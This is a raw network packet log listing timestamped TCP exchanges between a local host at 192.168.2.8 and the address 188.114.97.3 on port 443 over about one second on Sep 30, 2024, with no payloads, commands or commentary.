Sep 30, 2024 18:58:30.482702971 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482743025 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.482755899 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.483171940 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.483203888 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.483247042 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.483254910 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.483292103 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.487471104 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.539933920 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.569310904 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.569382906 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.569452047 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.569521904 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.569564104 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.569590092 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.569616079 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.569636106 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.569693089 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.570234060 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.570275068 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.570347071 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.570360899 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.571113110 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.571140051 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.571170092 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.571187973 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.571196079 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.571208954 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.571230888 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.571316004 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.583748102 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.584753036 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.584781885 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.584814072 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.584850073 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.584873915 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.584903002 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.585277081 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.585297108 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.585340977 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.585371017 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.585443020 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.656698942 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.656774044 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.656805038 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.656833887 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.656850100 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.656881094 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.656897068 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.656943083 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.657042027 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.657049894 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.657124996 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.657174110 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.657186985 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.657202959 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.657229900 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.657237053 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.657258987 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.658035040 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.658094883 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.658101082 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.658145905 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.658188105 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.658240080 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.659518957 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.659584999 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.660253048 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.660319090 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.670556068 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.670629025 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.670712948 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.670766115 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.671068907 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.671180010 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.671778917 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.671808958 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.671840906 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.671863079 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.671878099 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.671933889 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.671942949 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.671951056 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.671998024 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.742741108 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.742782116 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.742813110 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.742850065 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.742863894 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.742964983 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.743413925 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.743486881 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.743674040 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.743745089 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.744378090 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.744482040 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.744622946 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.744699955 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.745420933 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.745449066 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.745476961 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.745491982 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.745532990 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.745589018 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.746083975 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.746136904 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.746157885 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.746170998 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.746187925 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.746227026 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.746843100 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.746892929 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.746901989 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.746913910 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.746943951 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.746967077 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.747725964 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.747790098 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.747849941 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.747909069 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.757108927 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757174969 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.757241011 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757287025 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757303953 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.757335901 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757354021 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.757363081 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757425070 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.757441998 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757808924 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757853985 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.757872105 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757915974 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.757925034 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757935047 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.757987976 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.758004904 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.758075953 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.758658886 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.758698940 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.758709908 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.758727074 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.758740902 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.758744001 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.758793116 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.758805990 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.758866072 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.759819984 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.759880066 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.759994030 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.760047913 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.829366922 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.829431057 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.829462051 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.829519033 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.830254078 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.830271006 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.830321074 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.830334902 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.830355883 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.830374956 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.830775976 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.830838919 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.831485033 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.831521034 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.831548929 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.831562996 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.831593990 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.832338095 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.832396984 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.832403898 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.832417965 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.832459927 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.833262920 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.833323956 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.833332062 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.833342075 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.833374023 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.834212065 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.834228039 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.834286928 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.834299088 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.844367981 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.844382048 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.844444990 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.844480991 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.844683886 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.844765902 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.844777107 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.845530033 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.845547915 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.845587969 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.845602989 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.845622063 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.917560101 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.917584896 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.917686939 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.917794943 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.918072939 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.918092966 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.918148041 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.918179035 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.918222904 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.918881893 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.918895960 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.918977022 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.919012070 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.919353962 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.919373989 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.919420958 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.919449091 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.919478893 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.919498920 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.919574022 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.920120955 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.920136929 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.920243025 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.920274019 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.920572996 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.931010962 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.931035042 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.931123972 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.931159019 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.931243896 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.932068110 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.932112932 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.932168961 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.932185888 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.932231903 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.932266951 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.932374001 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.932391882 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.932455063 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.932465076 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.932516098 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.004657984 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.004688025 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.004769087 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.004802942 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.004853010 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.005054951 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005070925 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005122900 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.005130053 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005237103 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005280018 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.005285025 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005320072 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.005660057 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005676985 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005736113 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.005743980 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.005805016 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.005965948 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.006031990 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.006320953 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.006406069 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.006412029 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.006450891 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.009646893 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.009663105 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.009721041 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.009742022 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.009788036 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.019114017 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019136906 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019217014 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.019233942 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019279957 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.019448996 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019465923 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019520998 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.019527912 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019619942 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.019700050 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019735098 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019758940 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.019763947 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.019789934 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.091762066 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.091797113 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.091862917 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.091941118 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.091962099 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092273951 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092293978 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092365980 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092386007 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092422962 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092453957 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092497110 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092515945 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092535973 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092581987 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092664957 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092680931 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092749119 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092762947 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092825890 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092864037 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092901945 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092936993 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.092950106 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.092979908 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.093003988 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.105920076 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.105942965 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.106030941 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.106055021 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.106123924 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.106144905 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.106178999 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.106192112 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.106219053 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.106252909 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.106313944 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.106344938 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.106401920 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.178102970 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178128004 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178194046 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.178256035 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178272009 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.178320885 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.178622961 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178646088 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178706884 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.178725958 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178802967 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.178843021 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178858995 CEST	443	49722	188.114.97.3	192.168.2.8
